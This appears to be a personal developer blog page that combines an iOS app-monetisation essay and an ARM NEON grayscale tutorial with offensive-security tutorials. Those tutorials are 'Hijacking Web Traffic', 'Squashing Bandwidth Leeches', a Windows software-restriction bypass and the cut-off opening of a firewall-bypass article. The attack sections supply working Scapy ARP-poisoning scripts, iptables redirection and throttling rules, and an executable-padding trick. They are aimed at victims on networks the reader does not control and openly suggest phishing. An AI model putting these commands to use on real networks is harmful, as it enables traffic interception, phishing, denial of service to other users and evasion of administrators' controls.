A lot has changed since those early days. Smartphones are everywhere these days, and while that's great news for app developers, it seems like it's starting to become more and more difficult for indie developers to be able to get a foothold in the app world and actually make money. For this reason, I decided to write this article in an effort to help my fellow developers and entrepreneurs have a better understanding of what they need to do to make their apps successful and profitable.

[ The Two Most Important Factors to Consider ]

Alright, so you have a killer idea for a killer app that will make millions of dollars! Something that nobody has ever seen before, and something that is sure to set you up with a nice retirement spot on a beach somewhere warm and sunny. Or maybe not? Maybe your app is something a little more simple. Something that would be great for you and your friends, but has the potential to make money with others as well. Whatever the case may be, when it comes to making money on apps, there are two very important things that you need to consider before starting development: which platform you build for, and how you plan to monetize your app.

As dramatic as this may sound (and setting aside dumb luck), your answers to these questions could very well make or break the success of your app, and your company.

[ Choosing the Right Platform for Your Project ]

The only options that you should really even consider for this question are Android (Google) and iOS (Apple), since they are the platforms that dominate the smartphone market. Their creators also happen to provide the most robust third party developer tools, which means that you'll be able to do a lot more with your apps with a lot less work.

Some of you might be thinking, "Wait, what about other platforms like Blackberry or Windows Phone? There are lots of people who still use those!" While this might technically be true, it still doesn't make them serious competitors with Apple and Google. Their market share is nothing compared to Android and iOS, which together control 78% of the market and will continue to expand their control as time presses forward. So unless you feel there is a very important reason that your app should support one of the lesser platforms, your choice of what to develop for should only be between Android and iOS.


Here is where the great divide begins to manifest itself. Everybody seems to have their own idea about which platform is the "best". Truth be told, at least from a purely technical standpoint, both Android and iOS are solid platforms to develop apps on. However, when it comes to making money selling apps, they are miles apart.

I can confidently say that based on my own personal experience, if you are developing an app for distribution to the general public with the intent of making money, and you aren't a major corporation like ESPN or EA Games, you should develop your app for iOS before you ever consider porting it to Android. There are several reasons that lead me to this conclusion, both programming and business related, but the bottom line is simply this. As an independent developer, you will make more money with an app developed for iOS than you will with an app developed for Android. Now, allow me to explain further.

  • Android users do not buy apps.
    It's a harsh thing to say, but unfortunately it's the truth. I believe that the root of the problem stems from the fact that apps are intangible goods, and as such their perceived value is entirely dependent on the conditions of the market that they're sold in.

    For example, Google loves to brag about how Android is an open source mobile OS, and how they have such open market standards for app development. In fact all you need to do to publish an app to the Android Marketplace (or Google Play as it's called now), is pay a $25 developer license fee, and then upload your app. That's it.

    While this approach might sound great in theory, it has led to a major influx of poorly designed apps that do little more than saturate the market, making it harder for quality apps to be noticed. Moreover because there is no mandatory review process for app submissions, and Java developers are a dime a dozen, lots of companies have chosen to develop quick one-off apps filled with ads that they release for free. The idea being that since there are so many Android users on so many different devices, that the sheer volume of usage will generate enough ad revenue to make their apps profitable.

    The problem with this is that because so many companies have taken this approach, the Android app market has become flooded with so many free apps that do the same thing, that it's created an end-user mentality of, "Why would I buy your app when there are six others that do the same thing for free?" Even if your paid app is far and away the greatest app ever for what it does, 99% of the time it's going to lose to its free competitors.

    Apple on the other hand, requires that every new app submission and update be subject to a mandatory review process in order to ensure that the app in question adheres to all human interface guidelines and development standards set out for their platform. This helps to stem the flow of one-off freebie apps, which in turn helps to level the playing field for people selling paid apps.

    For further reading on the subject of why Android apps make less money than their iOS counterparts, take a look at the article Android Users Like Apps, But Don't Like Paying For Them

  • How about some statistics?
    I have an app called Find Me Food! that I've released for both iOS and Android. The Android version of Find Me Food! has had a grand total of 14 sales between the dates of February 8 2012 and March 14 2012 (a little over one month). Whereas the iOS version has sold 61 units between the dates of March 5 2012 and March 11 2012 (one week). Or in other words, the iOS version of my app makes nearly five times as much money in a single week as the Android version makes in an entire month.


    Performance Statistics for Find Me Food! (March 5 2012 - March 11 2012)


    Performance Statistics for Find Me Food! (February 8 2012 - March 14 2012)

  • Marketing your apps, the App Store vs Android Marketplace (now Google Play)
    When it comes to making money with apps, I've found that the first 90% of the work comes from developing the app, and the other 100% of it is in the marketing. A large part of your product's success will hinge on the distribution platform you choose for it. For iOS you have the Apple App Store, and for Android you have the Android Marketplace (now called Google Play). I personally feel that the App Store is the better choice of the two, at least from a marketing standpoint, for two reasons.

    1. With the App Store, you can generate promo codes for any of your apps that people can use once to download them for free. This is useful when submitting your app to review websites, as well as for special app giveaways and the like. Google Play however does not have this feature. If you want to give someone a free copy of your app, you actually have to provide them with a copy of your app binary. I don't know about you, but I'd much rather just give someone a one-time use promo code, instead of a full copy of my app that they could freely distribute to anybody they like without me ever knowing.

    2. With Google Play, if you ever decide to make your app free, it's stuck like that forever. Which means that you won't ever be able to quickly bolster your paid app's popularity and user base by making it free for a weekend.
          
  • iOS offers uniform hardware standards.
    One of the major reasons that Android has been able to come to control nearly 50% of the smartphone market, is because it is an open mobile OS designed to be able to run on just about any hardware. Which makes it possible for handset manufacturers to be able to put out cheap smartphones. However, this open attribute of Android's is a double edged sword.

    Because Android isn't designed to run on specific hardware, it loses a lot of finer performance optimizations that iOS has. It also forces developers to choose between either designing their apps to support the majority of handsets by tailoring their performance to the slowest device, or designing their apps to only work with specific handsets. Depending on the kind of app you are developing this may or may not be that big of an issue for you. However as you start to develop more resource intensive applications such as games, or augmented reality apps, it starts to become a real concern.

    On the other hand, developers making apps for iOS (for the most part) don't have to worry about this issue since Apple designs their mobile OS specifically to their own hardware (iPhone, iPod Touch, and iPad). This guarantees your apps the least amount of operating overhead between the OS and hardware, and the knowledge that all of your users are using the same hardware with only minor deviations in performance capabilities.

    One example of how this advantage can have a major effect on your app, is if the app does a lot of mathematical calculations, such as real time video data processing for augmented reality. If you were developing your app for iOS, then you would know for certain that any supported Apple device that would be running your app (read: anything newer than an iPhone 3G), would have a Cortex A8 (or better) CPU. Which would mean, that you could implement a video processing algorithm that uses ARM NEON intrinsic functions to process eight pixels of a video frame at a time, instead of just one.

    However, developing this same app for Android would require that you implement an additional non-intrinsic (and much slower) video processing algorithm for those devices that don't have Cortex A8 CPUs. In addition, because you have no way of knowing what the processing power is of the devices your users will be running your app on, its performance could vary greatly from device to device.

  • More iOS users are running the same, and often the latest, firmware.
    Every time Apple or Google releases an update to their mobile OS, lots of awesome new APIs and other things get added which help developers make even better apps. The only drawback is that these updates are only useful if people are actually using them. That being said, most iOS users are running the latest and greatest version, or are only one or two minor releases behind, unlike Android, where the majority of users are still running very old revisions of the OS.


    Android version usage statistics as of March 5 2012

    As of writing this article, the latest and greatest version of Android is version 4, codenamed Ice Cream Sandwich. However, according to Google's own platform version usage statistics, only 1.6% of Android users are actually using this version. The majority of Android handsets (62%) are instead running the much older version 2.3. This is unfortunate, because developers who want their apps to appeal to the majority of Android users have to forgo the features and improvements introduced in Android version 3.0 and beyond, and instead tailor their apps to the much older 2.x versions.

    What's even worse is that since it's up to manufacturers to handle porting Android to their devices, there's no guarantee that they'll ever see an update! Take for example my Samsung Galaxy S 4G: the most up to date firmware that Samsung offers for this phone is Android 2.3.6, and there appear to be no plans to make version 3.0 and beyond available. Unlike Apple, whose devices are all capable of running the latest version of iOS.


    iOS version usage statistics from August 2011

    It is a little bit more difficult to accurately gauge usage statistics for different versions of iOS, because Apple does not maintain active reports like Google does. However, fairly reliable usage statistics can be found from the blogs of various app developers. Despite the chart above being a year old, it more than illustrates my point that iOS users on average run the latest (or near latest) available firmware on their devices.

  • The Bottom Line
    There is nothing wrong with developing an app for Android. Despite the flaws and issues discussed above, it's still a solid mobile platform. That being said, I would highly recommend that you develop your app for iOS first, before you ever consider porting it to Android. You will make a lot more money doing so.

[ Choosing the Right Monetization Strategy ]

There are a few different ways that you can make money selling apps. It's important that you choose one or more strategies that play to the individual strengths of your app, so that you can squeeze as much revenue out of it as possible. Below are some different monetization strategies you could employ, as well as my thoughts and experiences using them.

  • Direct Paid App Sales
    The tried and true method of selling your apps for a fee. It's straightforward and simple, and if you've got a high quality app, it's the way to go (usually).

  • Ad Supported Free App
    With this strategy, you release your app for free, but fill it with ads. The idea is that because your app is free, it will get a lot of downloads (which is usually the case), and that all of those users seeing ads will generate a ton of ad revenue. While this may sound like a great approach in theory, in reality it's a fool's bet.

    Ad revenue is a joke. Unless you've created the next Angry Birds or the very first Flashlight App, your ad revenue isn't going to be nearly enough to constitute a reasonable return on your investment. To illustrate this point, let's take a look at some statistics from my app iManga Reader Lite, which uses the Freemium App Sales strategy (outlined below).


    iAd Performance Statistics for iManga Reader Lite (March 1 2012 - March 13 2012)

    As you can see from the chart above, for one day's worth of ad traffic, almost fourteen thousand requests for ads were generated from the app, of which only about 53% were actually filled. This produced a grand total of $1.49 in ad revenue for that day. Granted, some days are better than others, but this is about the general trend for ad revenue for this app.

    The bottom line is that making money off of ad revenue should be approached from the standpoint that it is a supplement to your overall profits, and NOT the main contributor. The margins are just too small for most people to be able to turn a profit with them alone.

  • Freemium + Paid App Sales
    A freemium app is a fully featured paid app that you release for free with certain features disabled, and ads placed throughout the user interface. The idea behind it being that lots of people will download it because it's free, and then they can opt to remove the ads and/or enable the advanced features of the app by making one or more in-app purchases.

    This is a strategy which really shines when you release a fully featured paid version of an app, and a freemium version of it as well. Some examples of this include my own apps iManga Reader Pro and iManga Reader Lite, as well as other apps like Words With Friends and Words With Friends Free, or Angry Birds and Angry Birds Free.

    A huge benefit to employing a paid and freemium app monetization strategy, is that it effectively doubles your app store presence (and potentially your overall revenue) instantly. Moreover, word of mouth marketing for your app will also flourish due to the fact that people can (and will) download your freemium app for well... free. It's important to understand though, that the majority of your actual sales will come from people buying the paid version of your app, while the freemium version will serve more as a way of drawing in potential customers.

    For example, the iManga Reader Lite usually sees between 125 and 200 downloads a day, and between 3 and 7 in-app purchase "upgrades" to the full version, whereas the iManga Reader Pro sees between 10 and 20 downloads a day.

  • Supplemental In-App Purchases
    Another great way to pad out your monthly app revenue, is through ancillary in-app purchases. These would be things that users could purchase to enhance their app experience, such as power ups, new characters, additional content, etc. The ideal supplemental in-app purchase item is something that is consumable, i.e. something that users can buy, use up, and then (hopefully) buy again.

[ And That's a Wrap ]

Well, I hope this article was helpful to you. If you have any more questions, or would like to talk to me about developing an app, feel free to contact me at brandon.smith@studiobebop.net

Happy coding!

iOS - How to convert BGRA video streams to Grayscale SUPER fast.

February 26, 2012 at 12:00 PM

==========

For a practical example of this algorithm, you can check out my app See It - Video Magnifier.

==========

I thought I would share a little tidbit of iOS development trickery that I finally got worked out today.

I'm working on an app at the moment that takes in a live video feed from a device's back-facing camera, and does some filtering to each frame before displaying it on the device's screen for the user. One of the filtering options my app does, is converting the video feed from color, to grayscale.

Before I go any further, I'm going to assume that you are familiar with AVCaptureSession, and with setting everything up to access a device camera and display a live preview feed. If not, take a look at Apple's RosyWriter example, and the AVCamDemo example from the WWDC 2010 example code.

The method I was using at first to accomplish this was to iterate through each pixel in a frame, calculate that pixel's weighted average of red, green, and blue values, and then apply that weighted average to the red, green, and blue channels of the pixel.

Like so,

- (void)processPixelBuffer: (CVImageBufferRef)pixelBuffer
{
    int BYTES_PER_PIXEL = 4;

    int bufferWidth = CVPixelBufferGetWidth(pixelBuffer);
    int bufferHeight = CVPixelBufferGetHeight(pixelBuffer);
    unsigned char *pixels = (unsigned char *)CVPixelBufferGetBaseAddress(pixelBuffer);

    for (int i = 0; i < (bufferWidth * bufferHeight); i++) {
        // Calculate the combined grayscale weight of the RGB channels
        int weight = (pixels[0] * 0.11) + (pixels[1] * 0.59) + (pixels[2] * 0.3);

        // Apply the grayscale weight to each of the color channels
        pixels[0] = weight; // Blue
        pixels[1] = weight; // Green
        pixels[2] = weight; // Red
        pixels += BYTES_PER_PIXEL;
    }
}
          

This above snippet of code will take a BGRA format CVImageBufferRef, and convert it to grayscale. Unfortunately for us, it's not very fast. Using the AVCaptureSessionPresetMedium video input setting, I was getting ~7fps on my 4th generation iPod Touch. (Which isn't necessarily bad, but could be better.)

So whilst Googling about for a way to speed up my BGRA to grayscale conversion algorithm, I came across a couple of articles discussing RGB to grayscale conversion using ARM NEON intrinsic functions.

ARM NEON intrinsic functions are not only a mouthful to say, but are also some sort of serious low-level coding black magic available to devices with ARM Cortex A8 (and later) CPUs that allows you to perform multiple computations at once. I couldn't explain the theory of it all to you to save my life, so I won't even bother trying. Suffice it to say that using intrinsic functions will allow us to process eight pixels at a time, as opposed to just one.

Those interested in learning more about the nitty gritty of ARM NEON, should take a look at "Introduction to NEON on iPhone" over on Wandering Coder.

One of those articles explains how to perform a BGRA to grayscale conversion on an AVCaptureSession video feed, but it doesn't explain it very well. So allow me to help fill in the gaps.

First, prepare your project to use NEON intrinsics by adding '-mfpu=neon' to your project's "Other C Flags", and setting your project's compiler to "LLVM GCC 4.2" (which you should be using already, since all the cool kids use Automatic Reference Counting these days).

Next, make sure you add this line to your video processing class' header file, otherwise you're going to get all sorts of frustrating compile errors.

#import "arm_neon.h"
          

Finally, implement the intrinsic BGRA to grayscale method outlined in that article. (Shown below.)

void neon_convert (uint8_t * __restrict dest, uint8_t * __restrict src, int numPixels)
{
    int i;
    uint8x8_t rfac = vdup_n_u8 (77);
    uint8x8_t gfac = vdup_n_u8 (151);
    uint8x8_t bfac = vdup_n_u8 (28);
    int n = numPixels / 8;

    // Convert eight pixels per iteration
    for (i = 0; i < n; ++i)
    {
        uint16x8_t  temp;
        uint8x8x4_t rgb  = vld4_u8 (src);
        uint8x8_t   result;

        temp = vmull_u8 (rgb.val[0],       bfac);
        temp = vmlal_u8 (temp, rgb.val[1], gfac);
        temp = vmlal_u8 (temp, rgb.val[2], rfac);

        result = vshrn_n_u16 (temp, 8);
        vst1_u8 (dest, result);
        src  += 8 * 4;
        dest += 8;
    }
}

This last step, however, is the trickiest of all, because unfortunately that article doesn't really tell you how to use this function, and it also leaves out one very important tidbit of information you're going to need: what the BGRA to grayscale method actually produces.

You see, you pass the method a CVPixelBuffer of image data (an array of pixels wherein each pixel has four values representing levels of blue, green, red, and alpha), along with an empty memory buffer. What the method then does is fill that buffer with the grayscale value for each pixel in the CVPixelBuffer, which by itself is totally useless.

So in order to actually make your video feed appear grayscale, you have to not only run each preview frame through your intrinsic method, but then apply the created grayscale values to each pixel in your preview frame.

So enough talk, here's all the code you're going to need to make it all happen!

void neon_convert (uint8_t * __restrict dest, uint8_t * __restrict src, int numPixels)
{
    int i;
    uint8x8_t rfac = vdup_n_u8 (77);
    uint8x8_t gfac = vdup_n_u8 (151);
    uint8x8_t bfac = vdup_n_u8 (28);
    int n = numPixels / 8;

    // Convert eight pixels per iteration
    for (i = 0; i < n; ++i)
    {
        uint16x8_t  temp;
        uint8x8x4_t rgb  = vld4_u8 (src);
        uint8x8_t   result;

        temp = vmull_u8 (rgb.val[0],       bfac);
        temp = vmlal_u8 (temp, rgb.val[1], gfac);
        temp = vmlal_u8 (temp, rgb.val[2], rfac);

        result = vshrn_n_u16 (temp, 8);
        vst1_u8 (dest, result);
        src  += 8 * 4;
        dest += 8;
    }
}

// Method that processes a CVPixelBuffer representation of a preview frame
- (void)processPixelBuffer: (CVImageBufferRef)pixelBuffer
{
    int BYTES_PER_PIXEL = 4; // BGRA

    // Lock the pixel buffer into place in memory
    CVPixelBufferLockBaseAddress( pixelBuffer, 0 );

    // Get the dimensions of the preview frame
    int bufferWidth = CVPixelBufferGetWidth(pixelBuffer);
    int bufferHeight = CVPixelBufferGetHeight(pixelBuffer);

    // Turn the CVPixelBuffer into something the intrinsic function can process
    uint8_t *pixel = CVPixelBufferGetBaseAddress(pixelBuffer);

    // Allocate some memory for the grayscale values that the intrinsic function will create
    uint8_t *baseAddressGray = (uint8_t *) malloc(bufferWidth * bufferHeight);

    // Convert BGRA values to grayscale values
    neon_convert(baseAddressGray, pixel, bufferWidth * bufferHeight);

    // Iterate through each pixel in the preview frame, and write its computed
    // grayscale value back into its blue, green, and red channels
    for (int i = 0; i < (bufferWidth * bufferHeight); i++) {
        pixel[0] = baseAddressGray[i];
        pixel[1] = baseAddressGray[i];
        pixel[2] = baseAddressGray[i];
        pixel += BYTES_PER_PIXEL;
    }

    // Release the grayscale values buffer
    free(baseAddressGray);

    // Unlock the pixel buffer, we're done processing it
    CVPixelBufferUnlockBaseAddress( pixelBuffer, 0 );
}

And that's it! Using this method, I'm able to get ~25fps on the same preview feed where I was only getting ~7fps with my original method.

[ Kick it up a notch, with inline assembly! ]

While the performance boost you get from using intrinsic functions is pretty great, you can get even more performance out of your app by using an inline ASM BGRA to grayscale conversion method, which is exactly what this article talks about doing. But again, the author doesn't explain how to do it (and there's a bug in his code that makes it unusable).

Luckily for you, I (and a kind anon) have worked out the kinks, and everything works super smoothly now.

All you need to do is add this method to your existing code,

static void neon_asm_convert(uint8_t * __restrict dest, uint8_t * __restrict src, int numPixels)
{
    __asm__ volatile("lsr %2, %2, #3 \n"       // numPixels / 8 = iteration count
                 "# build the three constants: \n"
                 "mov r4, #28 \n"              // Blue channel multiplier
                 "mov r5, #151 \n"             // Green channel multiplier
                 "mov r6, #77 \n"              // Red channel multiplier
                 "vdup.8 d4, r4 \n"
                 "vdup.8 d5, r5 \n"
                 "vdup.8 d6, r6 \n"
                 "0: \n"
                 "# load 8 pixels: \n"
                 "vld4.8 {d0-d3}, [%1]! \n"
                 "# do the weighted average: \n"
                 "vmull.u8 q7, d0, d4 \n"
                 "vmlal.u8 q7, d1, d5 \n"
                 "vmlal.u8 q7, d2, d6 \n"
                 "# shift and store: \n"
                 "vshrn.u16 d7, q7, #8 \n"     // Divide q7 by 256 and store the result in d7
                 "vst1.8 {d7}, [%0]! \n"
                 "subs %2, %2, #1 \n"          // Decrement iteration count
                 "bne 0b \n"                   // Repeat until iteration count reaches zero
                 : "+r"(dest), "+r"(src), "+r"(numPixels)  // modified by the post-increments and subs
                 :
                 : "r4", "r5", "r6",
                   "d0", "d1", "d2", "d3", "d4", "d5", "d6", "d7", "d14", "d15",
                   "cc", "memory"
                 );
}
          

And replace

neon_convert(baseAddressGray, pixel, bufferWidth*bufferHeight);
          

with

neon_asm_convert(baseAddressGray, pixel, bufferWidth*bufferHeight);
          

and you're done!

[ Here are some benchmarks ]

==========

For a practical example of this algorithm, you can check out my app See It - Video Magnifier.

==========

Hijacking Web Traffic

October 9, 2011 at 12:00 PM

In this article, I will explain how to intercept and control the web (HTTP/S) traffic of single or multiple hosts within a local area network. The attack itself is rather simple. First, an attacker poisons the ARP cache of a victim's workstation, effectively making the attacker a middle man between the victim and the router. Next, the victim generates some sort of web traffic, which is intercepted by the attacker and redirected to an HTTP server controlled by the attacker. This opens up the possibility for anything from a simple MITM phishing scheme to a network-wide Rick Roll.


[ Prerequisites ]

Before we begin, you'll need the following:

  • A Linux workstation with iptables, plus Python and the Scapy module.
  • An HTTP server you control (this article uses Apache).
  • The IP addresses of both the victim and the router.

Note: If you don't have a Linux workstation handy, then the Backtrack live CD is your best friend.
http://www.backtrack-linux.org/


[ Step 1: Configure HTTP Server ]

There are only two things you need to configure on your HTTP server. First, set your index page to whatever you want your victim to see. Next, and this is crucial, you need to set your index page as the page displayed for 404 errors. On Apache you do this by opening the httpd.conf file and searching for "ErrorDocument 404", which should bring you to a line that looks like:

#ErrorDocument 404 /missing.html 
          

You want to change this line to:

ErrorDocument 404 /news.py 
          

The reason this is needed is that if a victim requests something like "http://myspace.com/index.cfm?fuseaction=user", they'll still be served your intended page instead of the standard 404 error page.
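
If you want to sanity-check the catch-all behavior before going live, just request a nonsense path from your server and make sure your page comes back. Here's a quick Python 2 sketch (the server address is the same HTTP_Server_IP placeholder used below, and the path is just made up):

import urllib2

# The ErrorDocument trick serves our page for any bogus path. Depending on the
# setup, Apache may still report a 404 status code, so grab the body either way.
url = "http://HTTP_Server_IP/some/page/that/does/not/exist"
try:
    body = urllib2.urlopen(url).read()
except urllib2.HTTPError as e:
    body = e.read()
print(body[:200])  # should be the start of your page, not a stock "Not Found"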


[ Step 2: Configuring IP Tables ]

The next step is to configure IP Tables to listen for incoming traffic on a network interface and to either forward that traffic to the router or to your HTTP server. This is done with the following commands:

# These first four commands enable traffic forwarding, and tell IP Tables to listen for traffic
# on interface eth0 and to forward it out interface eth0.
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 0 > /proc/sys/net/ipv4/conf/eth0/send_redirects
iptables --append FORWARD --in-interface eth0 --jump ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 --jump MASQUERADE

# These next two commands tell IP Tables to change the destination address for any traffic
# received on TCP port 80 or 443 to the IP address of your HTTP server.
iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination HTTP_Server_IP
iptables -t nat -A PREROUTING -p tcp --dport 443 --jump DNAT --to-destination HTTP_Server_IP
          


[ Step 3: Poison The ARP Cache ]

Now that you've configured your system, it's finally time to carry out the attack! How you carry out this step is really up to you; all you need to do is poison the target's ARP cache so that the IP address of the router points to your workstation. There are many tools out there that can accomplish this task; however, in this tutorial I will be using Python and the Scapy module. Open up your Python interpreter and enter the following commands.

>>> import scapy, time # imports the scapy and time modules
>>> a = scapy.ARP() # creates an ARP packet object
>>> a.psrc = "192.168.1.1" # sets the 'from' IP address to the router's
>>> a.pdst = "192.168.1.12" # the victim's IP address
>>> while 1:
...     scapy.send(a) # sends the packet
...     time.sleep(90) # tells python to sleep for 90 seconds, and then send the packet again
          


[ Finale ]

Finally, you have finished your attack. You now have full control of your target's web traffic. Feel free to laugh maniacally at whatever dark horrors you've just exposed your victim to.

Squashing Bandwidth Leeches

October 9, 2011 at 12:00 PM

At times you may find yourself on a public network, only to be subjected to slower speeds because another user is taking up all the bandwidth downloading pr0n, music, games, etc. With no administrative rights to the network and your computer as your only weapon, what's a h4x0r to do? Fear not my friend, you have all you need, and James is here to help you take back the net! To be more specific, I will be discussing how to cut off a leech's Internet access, how to block specific ports from a leech, and how to regulate the amount of bandwidth a leech can use. So put your boots on, it's time to squash some leeches!


---[ Prerequisites ]---

  • A Linux system running kernel 2.4.20 or higher, with iptables.
  • Python, and the Scapy module.
  • A slight understanding of what iptables is.
  • If you don't have access to a computer that uses Linux, then you can just use the Backtrack live CD.
  • You will also need to know the IP address of both the leech, and the router for the network.
  • The following IP addresses will be used in this paper.
    Router IP: 192.168.1.1
    Your IP: 192.168.1.2 over interface eth0
    Leech IP: 192.168.1.11


---[ Phase 1: ARP Spoofing ]---

Address Resolution Protocol (ARP) is a TCP/IP protocol used to map an IP address to a physical (MAC) address. In order to communicate with a device on a network, a host needs to know that device's MAC and IP address. To learn a device's MAC address, a host will send out a broadcast that in essence says, "Hey, my IP address is 192.168.1.2 and my MAC address is AA:BB:CC:DD:EE:FF, what's the MAC address of 192.168.1.1?" Host 192.168.1.1 will make an entry in its ARP table that says, "192.168.1.2 is at AA:BB:CC:DD:EE:FF." It will then send a message to 192.168.1.2 that says, "I'm 192.168.1.1 and my MAC address is 00:11:22:33:44:55." Host 192.168.1.2 will then make an entry in its ARP table that says, "192.168.1.1 is at 00:11:22:33:44:55."

The problem is that when a host receives a 'who-has' ARP message, it will ALWAYS update its ARP table with the IP and MAC address of whoever sent the broadcast. So by sending a specially crafted 'who-has' message, it's possible to map any IP address in a host's ARP table to any MAC address you want.

How does all of this help stop bandwidth leeching? Well, in order to communicate with the outside world, a host will send traffic destined for outside the network to the router. The router then takes that traffic and sends it along to its destination. Now, if someone were to set the MAC address of the router on the leech's machine to something bogus, then traffic destined for the outside world would never reach the router! So launch your Python interpreter and let's give it a try, shall we? Use the following excerpt from my Python interpreter as a guide.

>>> import scapy, time
>>> a = scapy.ARP() # creates an ARP message object
>>> a.psrc = "192.168.1.1" # sets the 'from' IP address to the router's
>>> a.pdst = "192.168.1.11" # the leech's IP address
>>> a.hwsrc = "de:ad:be:ef:13:37" # sets the 'from' MAC address to a bogus one
>>> while 1:
...     scapy.send(a)
...     time.sleep(90) # sleep for 90 seconds and then send again
...
.
Sent 1 packets.
          


---[ Phase 2: Owning with MITM ]---

Now, while spoofing the router entry within a leech's ARP table to something bogus may be effective, it's not very fun. So instead of having packets destined for the router sent to nowhere, have them sent to you! Why would you want to do that? Well, because now you control their Internet connection, which allows you to control what they access and how much bandwidth they can use. So first things first, poison the leech's ARP table to point to you. Use the following excerpt from my Python interpreter as a guide.

>>> import scapy, time
>>> a = scapy.ARP() # creates an ARP message object
>>> a.psrc = "192.168.1.1" # sets the 'from' IP address to the router's
>>> # by not setting the hwsrc, the 'from' MAC address is set to our own
>>> a.pdst = "192.168.1.11" # the leech's IP address
>>> while 1:
...     scapy.send(a)
...     time.sleep(90)
          

Just poisoning the leech's ARP table isn't enough this time, though. You will need to set up some iptables rules to enable traffic forwarding. This is accomplished by entering the following commands as root.

echo 1 > /proc/sys/net/ipv4/ip_forward
echo 0 > /proc/sys/net/ipv4/conf/eth0/send_redirects
iptables --append FORWARD --in-interface eth0 --jump ACCEPT
          

The first two commands tell the kernel to enable packet forwarding and not to send ICMP redirects, while the last command adds an iptables rule that allows packets coming in on eth0 to be forwarded on to their destination. So now that traffic from the leech is being routed through your computer, let's block some ports!

iptables --insert FORWARD --protocol tcp --destination-port 80 --jump DROP 
          

The command above tells iptables to drop all packets to be forwarded that have a destination port of 80 (HTTP). In other words, the leech is now blocked from using HTTP. The reason '--insert' is used instead of '--append' is that rules in an iptables chain are evaluated in order, so rules that drop packets should come before rules that accept packets. I could go on and on about filtering network traffic, but there are plenty of papers about that subject already out there. So instead I'll give you a link to the iptables man page. http://linuxreviews.org/man/iptables


---[ Phase 3: Bandwidth Limiting ]---

Bandwidth limiting allows you to control how much bandwidth a leech can use. In other words, you could throttle a leech's connection speed down to that of a 56k modem, oh the irony. This is accomplished through the creation of a special queueing discipline, a.k.a. qdisc. First though, a brief summary of what a qdisc is, brought to you by "The Traffic Control HOWTO": http://tldp.org/HOWTO/Traffic-Control-HOWTO

Simply put, a qdisc is a scheduler. Every output interface needs a scheduler of some kind, and the default scheduler is a FIFO (First In First Out). Other qdiscs available under Linux will rearrange the packets entering the scheduler's queue in accordance with that scheduler's rules.

There are several different qdiscs out there, each with their own way of handling traffic. However, the qdisc we will be using is the Hierarchical Token Bucket (HTB) qdisc, because HTB makes it easy to regulate bandwidth. To set up HTB, enter the following commands as root.

tc qdisc add dev eth0 parent root handle 1: htb default 10
tc class add dev eth0 parent 1: classid 1:10 htb rate 100mbit prio 0
tc class add dev eth0 parent 1: classid 1:11 htb rate 56kbit prio 1
tc filter add dev eth0 protocol ip parent 1:0 handle 1337 fw flowid 1:11
          

The first command creates a new HTB qdisc for eth0, and tells it to default traffic to class 1:10. The second command creates the 'default' bandwidth class (identified as 1:10) with a maximum transmission speed of 100 megabits per second. The third command creates the 'leech' bandwidth class (identified as 1:11) with a maximum transmission speed of 56 kilobits per second. The last command tells the qdisc that any packets marked as 1337 (discussed below) should be placed into the 'leech' class. Finally, there are three iptables rules that must be applied in order to make all of this work.

iptables --table nat --append POSTROUTING --out-interface eth0 --jump MASQUERADE
iptables --table mangle --append FORWARD --in-interface eth0 --source 192.168.1.11 --jump MARK --set-mark 1337
iptables --table mangle --append FORWARD --in-interface eth0 --destination 192.168.1.11 --jump MARK --set-mark 1337
          

In order to control both the upload and download speed of the leech, NAT (called masquerading in Linux) is required. This is accomplished with the first command. The next two commands tell iptables to mark any packets from or to the leech's IP address as 1337. Those packets are then handled by the tc filter rule set up above. Game over, boom headshot, the end, no more leeching problem.


---[ Bonus! ]---

Below are two scripts to help make your leech squashing easier. The first poisons the leech's ARP table, and the second handles setting up iptables and HTB. Put both in the same directory, and run 'squashLeech.sh'.

Download: poisARP.py
Download: squashLeech.sh
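
If the download links ever die on you, poisARP.py is basically just the interpreter session from Phase 2 wrapped up in a script. A minimal sketch along those lines (not the original download) might look something like this, written against the current Scapy API rather than the old single-module one used above, with this article's example IP addresses hard-coded:

# poisARP.py -- a minimal sketch, not the original download
# Continuously tells the leech that the router's IP address belongs to us.
import time
from scapy.all import ARP, send

ROUTER_IP = "192.168.1.1"   # the router
LEECH_IP  = "192.168.1.11"  # the leech

packet = ARP(psrc=ROUTER_IP, pdst=LEECH_IP)  # 'from' the router, 'to' the leech

while True:
    send(packet, verbose=False)
    time.sleep(90)  # re-poison every 90 seconds

Run it as root, since Scapy needs raw socket access to send the packets.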

Sidestepping Windows Software Restriction Policies

October 9, 2011 at 12:00 PM

Computer administrators use software restriction policies to prevent users from installing and/or running unwanted programs, such as video games, on company computers. Windows has quite a few methods for restricting programs, a full list of which can be found here (http://technet2.microsoft.com/windowsse...21033.mspx). In this article, I will be discussing specifically how to bypass hash rules.

Hash rules work by adding an MD5 or SHA-1 hash of an application an administrator wants to restrict to a blacklist. Whenever a user tries to run a program, its hash is checked against the list of blacklisted programs; if it matches, the program is prevented from executing. Hash rules are useful because they remain effective regardless of whether a user moves or renames the file. The catch is that they only apply to files that produce the same hash as the file used to generate the rule. So in order to sidestep a hash rule, one need only modify the restricted executable so that its hash no longer matches the one in the rule.

Alright, on to business. First, create a text file in the directory of the restricted file. Next, open up a command prompt and cd into that same directory. Then run the following command:

copy /B restricted_exe.exe + text_file.txt new_exe.exe 
          

The result will be a slightly larger executable with a different hash from the original. That's it, you're done. It's that easy.
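
If you want to convince yourself that tacking a few extra bytes onto an executable really does change its hash, here's a quick Python sketch you can run against the two files from the command above (nothing fancy, just hashlib):

import hashlib

def md5_of(path):
    with open(path, "rb") as f:
        return hashlib.md5(f.read()).hexdigest()

print(md5_of("restricted_exe.exe"))  # the hash the blacklist rule was built from
print(md5_of("new_exe.exe"))         # the padded copy, a completely different hash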

Network Ninjitsu: The Art of Bypassing Firewalls and Web Filters

October 6, 2011 at 12:00 PM

(Originally published in the Spring 2007 issue of 2600: The Hacker Quarterly)

[ Introduction ]

Picture yourself in the following situation. You're at school/work, minding your own business, simply perusing the Internet and all it has to offer. However, when you try to visit your ninja clan's website, you are instead presented with a web page stating that this particular website is blocked. Naturally you are shocked and offended by such an action. So do something about it: sneak through like a ninja with an SSH tunnel.


[ A Brief Explanation ]

